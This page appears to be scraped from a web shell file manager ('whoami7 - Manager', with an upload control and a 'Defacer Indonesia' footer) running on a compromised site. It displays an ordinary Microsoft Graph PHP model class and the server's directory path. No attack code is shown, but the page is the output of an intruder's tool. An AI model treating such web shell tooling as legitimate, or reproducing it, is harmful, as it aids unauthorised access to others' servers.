whoami7 - Manager
:
/
home
/
qbizpnmr
/
arif.umairtax.com
/
vendor
/
microsoft
/
microsoft-graph
/
src
/
Model
/
Upload File:
files >> /home/qbizpnmr/arif.umairtax.com/vendor/microsoft/microsoft-graph/src/Model/ResourceOperation.php
<?php /** * Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. See License in the project root for license information. * * ResourceOperation File * PHP version 7 * * @category Library * @package Microsoft.Graph * @copyright (c) Microsoft Corporation. All rights reserved. * @license https://opensource.org/licenses/MIT MIT License * @link https://graph.microsoft.com */ namespace Microsoft\Graph\Model; /** * ResourceOperation class * * @category Model * @package Microsoft.Graph * @copyright (c) Microsoft Corporation. All rights reserved. * @license https://opensource.org/licenses/MIT MIT License * @link https://graph.microsoft.com */ class ResourceOperation extends Entity { /** * Gets the actionName * Type of action this operation is going to perform. The actionName should be concise and limited to as few words as possible. * * @return string|null The actionName */ public function getActionName() { if (array_key_exists("actionName", $this->_propDict)) { return $this->_propDict["actionName"]; } else { return null; } } /** * Sets the actionName * Type of action this operation is going to perform. The actionName should be concise and limited to as few words as possible. * * @param string $val The actionName * * @return ResourceOperation */ public function setActionName($val) { $this->_propDict["actionName"] = $val; return $this; } /** * Gets the description * Description of the resource operation. The description is used in mouse-over text for the operation when shown in the Azure Portal. * * @return string|null The description */ public function getDescription() { if (array_key_exists("description", $this->_propDict)) { return $this->_propDict["description"]; } else { return null; } } /** * Sets the description * Description of the resource operation. The description is used in mouse-over text for the operation when shown in the Azure Portal. * * @param string $val The description * * @return ResourceOperation */ public function setDescription($val) { $this->_propDict["description"] = $val; return $this; } /** * Gets the resourceName * Name of the Resource this operation is performed on. * * @return string|null The resourceName */ public function getResourceName() { if (array_key_exists("resourceName", $this->_propDict)) { return $this->_propDict["resourceName"]; } else { return null; } } /** * Sets the resourceName * Name of the Resource this operation is performed on. * * @param string $val The resourceName * * @return ResourceOperation */ public function setResourceName($val) { $this->_propDict["resourceName"] = $val; return $this; } }
Copyright ©2021 || Defacer Indonesia